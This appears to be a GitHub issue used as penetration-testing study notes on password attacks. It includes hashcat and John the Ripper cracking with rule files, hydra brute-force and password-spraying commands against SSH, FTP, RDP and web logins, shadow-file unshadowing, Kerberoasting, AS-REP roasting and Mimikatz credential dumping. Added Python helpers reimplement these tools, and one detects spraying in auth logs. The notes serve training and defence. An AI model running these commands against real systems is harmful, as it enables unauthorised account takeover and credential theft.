Open WDavid404 opened 8 months ago
crunch is one of many powerful tools for creating an offline wordlist. With crunch, we can specify numerous options, including the minimum and maximum length, the character set (or a pattern), and where to write the output.
The following example creates a wordlist containing all possible combinations of 2 characters, including 0-4 and a-d. We can use the -o argument and specify a file to save the output to.
crunch 2 2 01234abcd -o crunch.txt
crunch also lets us specify a pattern with the -t option, combining fixed text of our choice with placeholders. The placeholders are:
@ - lower case alpha characters
, - upper case alpha characters
% - numeric characters
^ - special characters including space
For example, if part of the password is known to us, and we know it starts with pass and is followed by two digits, we can use the % placeholder from above to match the digits. Here we generate a wordlist that contains pass followed by 2 digits:
crunch 6 6 -t pass%%
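To make the -t placeholders and the "min max charset" form concrete, here is an added Python example (not crunch's own code) that expands a pattern the way crunch does and counts the resulting keyspace, so a reviewer can see how many guesses a partially known password actually leaves. The set of characters behind ^ is an assumption; crunch's exact special-character set is not copied here.

```python
"""Added example (not crunch's own code): expand a crunch -t pattern or a
plain character set and count the resulting keyspace, so that a reviewer can
see how many guesses a partially known password actually leaves."""
from itertools import product
import string

# The -t placeholders listed above; any other character in the pattern is literal.
# The exact special-character set crunch uses is assumed here, not copied from crunch.
PLACEHOLDERS = {
    "@": string.ascii_lowercase,                       # lower case alpha
    ",": string.ascii_uppercase,                       # upper case alpha
    "%": string.digits,                                # numeric
    "^": " !\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~",        # special characters including space
}

def pattern_keyspace(pattern):
    """Number of candidates the pattern expands to: product of the placeholder sizes."""
    size = 1
    for ch in pattern:
        size *= len(PLACEHOLDERS.get(ch, ch))          # a literal contributes 1
    return size

def expand_pattern(pattern):
    """Yield every candidate, leftmost position varying slowest (crunch's order)."""
    slots = [PLACEHOLDERS.get(ch, ch) for ch in pattern]
    for combo in product(*slots):
        yield "".join(combo)

def expand_charset(charset, min_len, max_len):
    """crunch <min> <max> <charset>: all combinations of the charset for each length."""
    for length in range(min_len, max_len + 1):
        for combo in product(charset, repeat=length):
            yield "".join(combo)

def summarize(pattern):
    """(count, first, last) for a pattern, e.g. 'pass%%' -> (100, 'pass00', 'pass99')."""
    candidates = list(expand_pattern(pattern))
    return len(candidates), candidates[0], candidates[-1]

if __name__ == "__main__":
    # Equivalent of: crunch 6 6 -t pass%%
    print("pass%%:", summarize("pass%%"))
    # Equivalent of: crunch 2 2 01234abcd
    print("01234abcd, length 2:", sum(1 for _ in expand_charset("01234abcd", 2, 2)), "candidates")
    # Policy view: four trailing digits are cheap to enumerate, eight lowercase letters are not.
    print("%%%%:", pattern_keyspace("%%%%"), " @@@@@@@@:", pattern_keyspace("@@@@@@@@"))
```

pattern_keyspace is the number worth looking at when reviewing a password policy: a known prefix plus two digits leaves 100 guesses, which no lockout threshold will stop.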
cupp (https://github.com/Mebus/cupp):
git clone https://github.com/Mebus/cupp.git
python3 cupp.py      # see the available options
python3 cupp.py -i   # interactive mode
python3 cupp.py -l   # download pre-created wordlists
python3 cupp.py -a   # provide default usernames and passwords from the Alecto database
hashid or hash-identifier: identify the type of a hash (https://www.kali.org/tools/hashid/)
hashid '$2y$10$XrrpX8RD6IFvBwtzPuTlcOqJ8kO2px2xsh17f60GZsBKLeszsQTBC'
Note: if the hash contains special characters such as $, wrap it in single quotes, not double quotes.
In Bash and zsh, single quotes (') and double quotes (") have different meanings: single quotes preserve the literal value of all characters within the quotes, while double quotes allow variable substitution, command substitution, and interpretation of certain escape sequences. For example, if you have a variable x=5, then echo '$x' will print $x, whereas echo "$x" will print 5. Inside double quotes the $2, $10 and $Xrr... pieces of the bcrypt hash above would be expanded as positional parameters and variables, so the tool would receive a mangled string.
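As an added illustration of what hashid does (this is not hashid's or hash-identifier's code), the following Python guesses a hash type from its prefix and length and maps it to the hashcat -m and john --format values used in these notes. The lookup table is constructed for this example; bare hex is ambiguous (an NTLM hash has the same shape as MD5), so every matching type is returned rather than one guess.

```python
"""Added example (not hashid's or hash-identifier's code): guess a hash's
type from its prefix and length and map it to the hashcat -m and john
--format values used in these notes."""
import re

# Constructed lookup table: (name, pattern, hashcat mode, john format)
HASH_TYPES = [
    ("bcrypt",      r"^\$2[abxy]\$\d{2}\$[./A-Za-z0-9]{53}$", 3200, "bcrypt"),
    ("sha512crypt", r"^\$6\$(?:rounds=\d+\$)?[^$]{1,16}\$[./A-Za-z0-9]{86}$", 1800, "sha512crypt"),
    ("md5crypt",    r"^\$1\$[^$]{1,8}\$[./A-Za-z0-9]{22}$", 500, "md5crypt"),
    ("phpass",      r"^\$[PH]\$[./A-Za-z0-9]{31}$", 400, "phpass"),
    ("MD5",         r"^[0-9a-f]{32}$", 0, "raw-md5"),
    ("NTLM",        r"^[0-9a-f]{32}$", 1000, "NT"),      # same shape as MD5: ambiguous
    ("SHA-1",       r"^[0-9a-f]{40}$", 100, "raw-sha1"),
    ("SHA-256",     r"^[0-9a-f]{64}$", 1400, "raw-sha256"),
]
COMPILED = [(n, re.compile(p, re.IGNORECASE), m, f) for n, p, m, f in HASH_TYPES]

def identify(h):
    """Return [(name, hashcat_mode, john_format), ...] for every type h could be."""
    h = h.strip()
    return [(n, m, f) for n, rx, m, f in COMPILED if rx.match(h)]

def identify_file(text):
    """One result list per non-empty line, for a hashes.txt with mixed types."""
    return {ln.strip(): identify(ln) for ln in text.splitlines() if ln.strip()}

if __name__ == "__main__":
    # The three hash values appear elsewhere in these notes.
    for h in ["f621b6c9eab51a3e2f4e167fee4c6860",
              "$2y$10$XrrpX8RD6IFvBwtzPuTlcOqJ8kO2px2xsh17f60GZsBKLeszsQTBC",
              "$6$riekpK4m$uBdaAyK0j9WfMzvcSKYVfyEHGtBfnfpiVbYbzbVmfbneEbo0wSijW1GQussvJSk8X1M56kzgGj8f7DFN1h4dy1"]:
        print(h[:24] + "...", "->", identify(h) or "unknown")
```

Because the hash is passed as a Python string literal inside the script, the shell quoting problem does not arise; on the command line the same values must be single-quoted.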
hashcat rules: https://hashcat.net/wiki/doku.php?id=rule_based_attack
kali@kali:~/passwordattacks$ echo "\$1 c" > demo1.rule
kali@kali:~/passwordattacks$ cat demo1.rule
$1 c
kali@kali:~/passwordattacks$ hashcat -r demo1.rule --stdout demo.txt
Password1
Iloveyou1
Princess1
Rockyou1
Abc1231
kali@kali:~/passwordattacks$ cat demo2.rule
$1
c
kali@kali:~/passwordattacks$ hashcat -r demo2.rule --stdout demo.txt
password1
Password
iloveyou1
Iloveyou
princess1
Princess
...
kali@kali:~/passwordattacks$ cat demo1.rule
$1 c $!
kali@kali:~/passwordattacks$ hashcat -r demo1.rule --stdout demo.txt
Password1!
Iloveyou1!
Princess1!
Rockyou1!
Abc1231!
kali@kali:~/passwordattacks$ cat demo2.rule
$! $1 c
kali@kali:~/passwordattacks$ hashcat -r demo2.rule --stdout demo.txt
Password!1
Iloveyou!1
Princess!1
Rockyou!1
Abc123!1
kali@kali:~/passwordattacks$ cat crackme.txt
f621b6c9eab51a3e2f4e167fee4c6860
kali@kali:~/passwordattacks$ cat demo3.rule
$1 c $!
$2 c $!
$1 $2 $3 c $!
kali@kali:~/passwordattacks$ hashcat -m 0 crackme.txt /usr/share/wordlists/rockyou.txt -r demo3.rule --force
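The demo1/demo2 sessions above hinge on one detail: functions on the same line are applied in sequence to produce one candidate, while each line of a rule file is a separate rule that produces its own candidate. The following added Python (not hashcat's code) is a small interpreter for exactly the functions used above; the wordlist is reconstructed from the --stdout output shown, and the candidate count it reports (words x rules) is the figure to keep in mind when judging how much a rule file enlarges an attack.

```python
"""Added example (not hashcat's code): a small interpreter for the hashcat rule
functions used in demo1/demo2/demo3 above. The wordlist is reconstructed from
the --stdout output shown in the notes."""

DEMO_WORDS = ["password", "iloveyou", "princess", "rockyou", "abc123"]

def apply_rule(rule, word):
    """Apply one rule line (space-separated functions, left to right) to one word.
    Only the functions needed here are implemented; '$ ' (append a space) is
    not representable with split() and is deliberately unsupported."""
    for fn in rule.split():
        op, arg = fn[0], fn[1:]
        if op == ":":                       # no-op, emits the word unchanged
            continue
        if op == "l":
            word = word.lower()
        elif op == "u":
            word = word.upper()
        elif op == "c":                     # capitalise first char, lowercase the rest
            word = word[:1].upper() + word[1:].lower()
        elif op == "C":                     # lowercase first char, uppercase the rest
            word = word[:1].lower() + word[1:].upper()
        elif op == "t":                     # toggle case of every char
            word = word.swapcase()
        elif op == "r":                     # reverse
            word = word[::-1]
        elif op == "d":                     # duplicate
            word = word + word
        elif op == "$":                     # append one character
            word = word + arg
        elif op == "^":                     # prepend one character
            word = arg + word
        elif op == "[":                     # delete first char
            word = word[1:]
        elif op == "]":                     # delete last char
            word = word[:-1]
        else:
            raise ValueError(f"unsupported rule function {fn!r}")
    return word

def load_rules(text):
    """One rule per non-empty line; lines starting with '#' are comments."""
    return [ln.strip() for ln in text.splitlines()
            if ln.strip() and not ln.lstrip().startswith("#")]

def run_rules(words, rules_text):
    """Equivalent of `hashcat -r rules --stdout wordlist`: for each word, every rule."""
    rules = load_rules(rules_text)
    return [apply_rule(r, w) for w in words for r in rules]

if __name__ == "__main__":
    for name, rules in [("demo1", "$1 c"), ("demo2", "$1\nc"),
                        ("demo1 (2nd)", "$1 c $!"), ("demo2 (2nd)", "$! $1 c"),
                        ("demo3", "$1 c $!\n$2 c $!\n$1 $2 $3 c $!")]:
        out = run_rules(DEMO_WORDS, rules)
        print(f"{name}: {len(out)} candidates, e.g. {out[:4]}")
```

Note that order matters within a line: "$! $1 c" appends "!" before "1", which is why the second demo2 run printed Password!1 rather than Password1!.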
ls -la /usr/share/hashcat/rules/
hashcat -a 0 -m 0 f806fc5a2a0d5ba2471600758452799c /usr/share/wordlists/rockyou.txt
-a 0 sets the attack mode to a dictionary attack
-m 0 sets the hash mode for cracking MD5 hashes; for other types, run hashcat -h for a list of supported hashes.
f806fc5a2a0d5ba2471600758452799c is the target: a single hash as in our example, or a file that contains one or more hashes.
/usr/share/wordlists/rockyou.txt is the wordlist/dictionary file for our attack.
We run hashcat with --show option to show the cracked value if the hash has been cracked:
hashcat -a 0 -m 0 F806FC5A2A0D5BA2471600758452799C /usr/share/wordlists/rockyou.txt --show
hashcat -a 3 -m 0 05A5CF06982BA7892ED2A6D38FE832D6 ?d?d?d?d
05a5cf06982ba7892ed2a6d38fe832d6:2021
-a 3 sets the attack mode to a brute-force (mask) attack
?d?d?d?d the ?d tells hashcat to use a digit. In our case, ?d?d?d?d for four digits starting with 0000 and ending at 9999
Other options:
--stdout prints the generated candidates to the terminal instead of cracking anything
John the Ripper: if you are using Kali, the rockyou wordlist is at /usr/share/wordlists/rockyou.txt. We will also have a crack.txt file containing just the password hash:
edba955d0ea15fdef4f61726ef97e5af507430c0
then, run:
john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-md5 crack.txt
john --wordlist=/usr/share/wordlists/rockyou.txt --format=phpass crack.txt
Rule-Based attacks are also known as hybrid attacks. Rule-Based attacks assume the attacker knows something about the password policy.
Read /etc/john/john.conf and look for List.Rules to see all the available rules:
cat /etc/john/john.conf|grep "List.Rules:" | cut -d"." -f3 | cut -d":" -f2 | cut -d"]" -f1 | awk NF
Example: start from a wordlist with only one password, tryhackme, and see how many candidates a rule set generates from it:
john --wordlist=/tmp/single-password-list.txt --rules=best64 --stdout | wc -l
john --wordlist=/tmp/single-password-list.txt --rules=KoreLogic --stdout | grep "Tryh@ckm3"
We can add our rule to the end of john.conf:
user@machine$ sudo vi /etc/john/john.conf
[List.Rules:THM-Password-Attacks]
Az"[0-9]" ^[!@#$]
Explanation:
[List.Rules:THM-Password-Attacks] specify the rule name THM-Password-Attacks.
Az represents a single word from the original wordlist/dictionary using -p.
"[0-9]" append a single digit (from 0 to 9) to the end of the word. For two digits, we can add "[0-9][0-9]" and so on.
^[!@#$] add a special character at the beginning of each word. ^ means the beginning of the line/word. Note, changing ^ to $ will append the special characters to the end of the line/word.
Now let's create a file containing a single word password to see how we can expand our wordlist using this rule.
echo "password" > /tmp/single.lst
Use the customized rule
user@machine$ john --wordlist=/tmp/single.lst --rules=THM-Password-Attacks --stdout
Using default input encoding: UTF-8
!password0
@password0
#password0
$password0
Write the output to a new wordlist file:
john --wordlist=/tmp/single.lst --rules=THM-Password-Attacks --stdout > new_wordlist.lst
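The custom rule above turns one word into 40 candidates because John's preprocessor expands each [...] character class into one concrete rule per character. The added Python below (not John the Ripper's code) reads a constructed john.conf fragment, lists its [List.Rules:...] sections as the grep pipeline earlier does, expands the classes in the THM-Password-Attacks rule, and applies the three rule commands it uses (Az"...", ^c and $c). The expansion order (first class outermost) is taken from the output shown above.

```python
"""Added example (not John the Ripper's code): parse [List.Rules:NAME] sections
from a john.conf-style text, expand [...] character classes the way the rule
preprocessor does, and apply the Az"str" / ^c / $c commands used above."""
import re
from itertools import product

# Constructed john.conf fragment; the real file has many more sections.
JOHN_CONF = """
[List.Rules:Wordlist]
:
[List.Rules:THM-Password-Attacks]
Az"[0-9]" ^[!@#$]
"""

def rule_sections(conf_text):
    """Names of all [List.Rules:...] sections (what the grep pipeline prints)."""
    return re.findall(r"^\[List\.Rules:([^\]]+)\]", conf_text, re.MULTILINE)

def rules_in_section(conf_text, name):
    """Rule lines of one section: everything until the next [...] header."""
    lines, inside = [], False
    for ln in conf_text.splitlines():
        if ln.startswith("["):
            inside = ln.strip() == f"[List.Rules:{name}]"
            continue
        if inside and ln.strip() and not ln.startswith("#"):
            lines.append(ln.strip())
    return lines

def expand_class(cls):
    """'[0-9]' -> '0123456789', '[!@#$]' -> '!@#$' (ranges and literal sets)."""
    body, chars, i = cls[1:-1], [], 0
    while i < len(body):
        if i + 2 < len(body) and body[i + 1] == "-":
            chars.extend(chr(c) for c in range(ord(body[i]), ord(body[i + 2]) + 1))
            i += 3
        else:
            chars.append(body[i])
            i += 1
    return "".join(chars)

def preprocess(rule):
    """Expand every [...] class into concrete rules, first class varying slowest."""
    parts = re.split(r"(\[[^\]]*\])", rule)
    options = [expand_class(p) if p.startswith("[") else [p] for p in parts]
    return ["".join(combo) for combo in product(*options)]

def apply_concrete_rule(rule, word):
    """Apply the subset of rule commands needed here: ':', Az"str", ^c, $c."""
    i = 0
    while i < len(rule):
        if rule[i] in " :":                      # separator / no-op
            i += 1
        elif rule.startswith('Az"', i):          # append a string at the end
            end = rule.index('"', i + 3)
            word += rule[i + 3:end]
            i = end + 1
        elif rule[i] == "^":                     # prepend one character
            word = rule[i + 1] + word
            i += 2
        elif rule[i] == "$":                     # append one character
            word += rule[i + 1]
            i += 2
        else:
            raise ValueError(f"unsupported command at {i}: {rule[i:]!r}")
    return word

def generate(conf_text, section, words):
    """john --wordlist=... --rules=SECTION --stdout: each expanded rule over every word."""
    concrete = [c for r in rules_in_section(conf_text, section) for c in preprocess(r)]
    return [apply_concrete_rule(c, w) for c in concrete for w in words]

if __name__ == "__main__":
    print("sections:", rule_sections(JOHN_CONF))
    out = generate(JOHN_CONF, "THM-Password-Attacks", ["password"])
    print(len(out), "candidates; first four:", out[:4], "last:", out[-1])
```

generate() mirrors "--stdout": pipe-equivalent results can be written to a file the same way the new_wordlist.lst command above does.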
https://www.openwall.com/john/doc/FAQ.shtml
All of the password hashes found in the file (that are of the same type as the very first recognized hash in the file unless you're using the "--format=..." option) might be already cracked by previous invocations of John.
To display cracked passwords, use "john --show" on your password hash file(s).
john --show crack.txt
To force John to crack those same hashes again, remove the john.pot file.
┌──(kali㉿kali)-[~/Downloads]
└─$ cat passwd.txt
root:x:0:0:root:/root:/bin/bash
┌──(kali㉿kali)-[~/Downloads]
└─$ cat shadow.txt
root:$6$riekpK4m$uBdaAyK0j9WfMzvcSKYVfyEHGtBfnfpiVbYbzbVmfbneEbo0wSijW1GQussvJSk8X1M56kzgGj8f7DFN1h4dy1:18226:0:99999:7:::
└─$ unshadow passwd.txt shadow.txt > unshadowed.txt
┌──(kali㉿kali)-[~/Downloads]
└─$ cat unshadowed.txt
root:$6$riekpK4m$uBdaAyK0j9WfMzvcSKYVfyEHGtBfnfpiVbYbzbVmfbneEbo0wSijW1GQussvJSk8X1M56kzgGj8f7DFN1h4dy1:0:0:root:/root:/bin/bash
┌──(kali㉿kali)-[~/Downloads]
└─$ john --format=crypt --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
If you get the error 'No password hashes loaded (see FAQ)', try adding '--format=crypt':
john --format=crypt --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
https://superuser.com/questions/1684358/john-the-ripper-on-kali-linux-it-outputs-no-password-hashes-loaded
Alternatively, remove the .pot and .log files and then try again: rm .john/john.pot .john/john.log
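What unshadow does is a simple join on the username: the hash from shadow replaces the 'x' placeholder in the passwd line so that john sees the hash in field two. The following added Python (not the unshadow program) performs that merge on the root entries shown above plus a constructed locked daemon account, and also lists which accounts carry a real hash at all, which is the check worth running when reviewing a host for accounts that would be exposed by a shadow file leak.

```python
"""Added example (not the unshadow program): merge passwd and shadow entries by
username so that the hash replaces the 'x' placeholder, the layout john loads.
The root entries are the ones shown above; the daemon entry is constructed."""

PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
"""
SHADOW = """\
root:$6$riekpK4m$uBdaAyK0j9WfMzvcSKYVfyEHGtBfnfpiVbYbzbVmfbneEbo0wSijW1GQussvJSk8X1M56kzgGj8f7DFN1h4dy1:18226:0:99999:7:::
daemon:*:18226:0:99999:7:::
"""

def parse_shadow(text):
    """username -> password field of /etc/shadow ('*' and '!' mark locked accounts)."""
    hashes = {}
    for ln in text.splitlines():
        if ln.strip() and not ln.startswith("#"):
            fields = ln.split(":")
            hashes[fields[0]] = fields[1]
    return hashes

def unshadow(passwd_text, shadow_text):
    """Return passwd lines with field 2 replaced by the matching shadow field."""
    hashes = parse_shadow(shadow_text)
    merged = []
    for ln in passwd_text.splitlines():
        fields = ln.split(":")
        if len(fields) != 7:                     # skip blank or malformed lines
            continue
        fields[1] = hashes.get(fields[0], fields[1])   # keep 'x' if no shadow entry
        merged.append(":".join(fields))
    return merged

def crackable_accounts(shadow_text):
    """Usernames whose shadow field is a real crypt(3) hash rather than a lock marker."""
    return [u for u, h in parse_shadow(shadow_text).items() if h.startswith("$")]

if __name__ == "__main__":
    for line in unshadow(PASSWD, SHADOW):
        print(line)
    print("accounts with a real hash:", crackable_accounts(SHADOW))
```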
Hydra supports an extensive list of network services to attack. Using hydra, we'll brute-force network services such as web login pages, FTP, SMTP, and SSH in this section.
//FTP
hydra -L userlist.txt -P passwordlist.txt 192.168.0.107 ftp --> user list x password list is very slow; not recommended
hydra -l <ftpuser> -P passwordlist.txt 192.168.0.107 ftp
//SMTP
hydra -l email@company.xyz -P /path/to/wordlist.txt smtp://10.10.x.x -v
//SSH
hydra -L users.lst -P /path/to/wordlist.txt ssh://10.10.x.x -v
// OSCP example for SSH
hydra -l george -P /usr/share/wordlists/rockyou.txt -s 2222 ssh://192.168.50.201
## -s: port
## -l: a single login name (LOGIN)
// OSCP example for RDP
Case: the password is known but the username is not:
hydra -L /usr/share/wordlists/dirb/others/names.txt -p "SuperS3cure1337#" rdp://192.168.50.202
//Login page
hydra -l admin -P 500-worst-passwords.txt 10.10.x.x http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:S=logout.php" -f
or
hydra -l admin -P 500-worst-passwords.txt 10.10.x.x http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:S=logout.php" -t 32 -f -vV
(from OSCP)
hydra -l user -P /usr/share/wordlists/rockyou.txt 192.168.50.201 http-post-form "/index.php:fm_usr=user&fm_pwd=^PASS^:Login failed. Invalid"
Note: 'Login failed. Invalid' is the text the page shows on a failed login; hydra treats a third field without an S= prefix as the failure string.
(from OSCP) For a web page protected by HTTP Basic authentication (as in the figure below):
hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.250.201 http-get
Adding an option such as -t 32 (number of parallel connections) to the hydra command makes it faster.
Try entering arbitrary values in the username and password fields; the browser's URL shows a GET query to /login-get/index.php?username=xxx&password=xxx, so hydra can be used with http-get-form:
hydra -l phillips -P clinic.lst 10.10.236.3 http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:S=logout.php" -f
Note: if the login request is a POST, the command above must use http-post-form instead.
Scenario (password spraying): the password (e.g. an initial or default password) and a list of usernames are known. For example, an attacker will use one password (say, Secure@123) against many different accounts on the application to avoid account lockouts that would normally occur when brute forcing a single account with many passwords.
hydra -L usernames-list.txt -p Spring2021 ssh://10.1.1.10
python3 RDPassSpray.py -u victim -p Spring2021! -t 10.100.10.240:3026
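From the defender's side, the two hydra patterns above (many passwords against one account, one password against many accounts) leave very different shapes in the authentication log, and lockout policies only catch the first. The added Python below (defensive tooling written for this note, not part of hydra or the OSCP material) runs over constructed sshd-style log lines and labels each source address as brute-force, spray or normal; the thresholds are assumptions to tune per environment.

```python
"""Added example (defensive, not hydra's code): classify login-failure patterns
per source address from sshd-style auth log lines. The log lines are
constructed for this example; thresholds are assumptions."""
import re
from collections import defaultdict

FAILED = re.compile(
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<src>\d+(?:\.\d+){3})")

def _line(ts, pid, msg):
    """Build one constructed syslog-style sshd line."""
    return f"Mar  1 {ts} host sshd[{pid}]: {msg} port {40000 + pid} ssh2"

SAMPLE_LOG = (
    # one account, many guesses from one source: dictionary-attack shape
    [_line(f"10:00:{i:02d}", 100 + i, "Failed password for george from 192.168.50.10")
     for i in range(12)]
    # many accounts, one guess each from one source: password-spraying shape
    + [_line(f"10:01:{i:02d}", 200 + i, f"Failed password for invalid user {u} from 10.1.1.99")
       for i, u in enumerate(["alice", "bob", "carol", "dave", "erin", "frank"])]
    # a user mistyping once and then logging in: normal
    + [_line("10:02:00", 301, "Failed password for george from 172.16.0.7"),
       _line("10:02:05", 302, "Accepted password for george from 172.16.0.7")]
)

def failures_by_source(lines):
    """source IP -> {username: number of failed attempts}."""
    table = defaultdict(lambda: defaultdict(int))
    for ln in lines:
        m = FAILED.search(ln)
        if m:
            table[m["src"]][m["user"]] += 1
    return table

def classify(lines, bf_threshold=10, spray_users=5, spray_max_per_user=2):
    """Label each source: 'brute-force' if one account sees >= bf_threshold failures,
    'spray' if >= spray_users distinct accounts each see few failures, else 'normal'."""
    verdicts = {}
    for src, users in failures_by_source(lines).items():
        worst = max(users.values())
        if worst >= bf_threshold:
            verdicts[src] = "brute-force"
        elif len(users) >= spray_users and worst <= spray_max_per_user:
            verdicts[src] = "spray"
        else:
            verdicts[src] = "normal"
    return verdicts

if __name__ == "__main__":
    for src, verdict in classify(SAMPLE_LOG).items():
        users = failures_by_source(SAMPLE_LOG)[src]
        print(f"{src:15} {verdict:12} {sum(users.values())} failures over {len(users)} account(s)")
```

A per-account lockout counter never fires for the 10.1.1.99 source, which is exactly why spraying is detected on the source and the distinct-user count rather than on the account.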
Historically, system administrators often changed local workstation passwords through Group Policy Preferences (GPP). However, even though GPP-stored passwords are encrypted with AES-256, the private key for the encryption has been posted on MSDN. We can use this key to decrypt these encrypted passwords. In this case, we'll use the gpp-decrypt ruby script in Kali Linux, which decrypts a given GPP-encrypted string:
kali@kali:~$ gpp-decrypt "+bsY0V3d4/KgX3VJdO/vyepPfAN1zMFTiQDApgR92JE"
P@$$w0rd
The hashcat mode number for Atlassian (PBKDF2-HMAC-SHA1) hashes is 12001:
hashcat -m 12001 hashes.txt /usr/share/wordlists/fasttrack.txt
AS-REP roasting (accounts with 'Do not require Kerberos preauthentication' enabled):
impacket-GetNPUsers -dc-ip 192.168.50.70 -request -outputfile hashes.asreproast corp.com/pete
hashcat -m 18200 <hashfile> <Wordlists> -r <rule> --force
Kerberoasting:
.\Rubeus.exe kerberoast /outfile:hashes.kerberoast
hashcat -m 13100 <hashfile> <Wordlists> -r <rule> --force
Mimikatz:
privilege::debug
sekurlsa::logonpasswords
lsadump::dcsync /user:<Domain>\<TargetUsername>
hashcat -m 1000 <hashfile> <Wordlists> -r <rule> --force
Password Cracking vs. Password Guessing
Default Passwords
https://cirt.net/passwords
https://default-password.info/
https://datarecovery.com/rd/default-passwords/
Weak Passwords
https://wiki.skullsecurity.org/index.php?title=Passwords - This includes the most well-known collections of passwords. SecLists - A huge collection of all kinds of lists, not only for password cracking.
Leaked Passwords
The following are some of the common password lists that have weak and leaked passwords, including the webhost, elitehacker, hak5, Hotmail and PhpBB leaks: SecLists/Passwords/Leaked-Databases
Combined wordlists
Customized Wordlists
Username Wordlists
username_generator: could help create a list with most of the possible combinations if we have a first name and last name.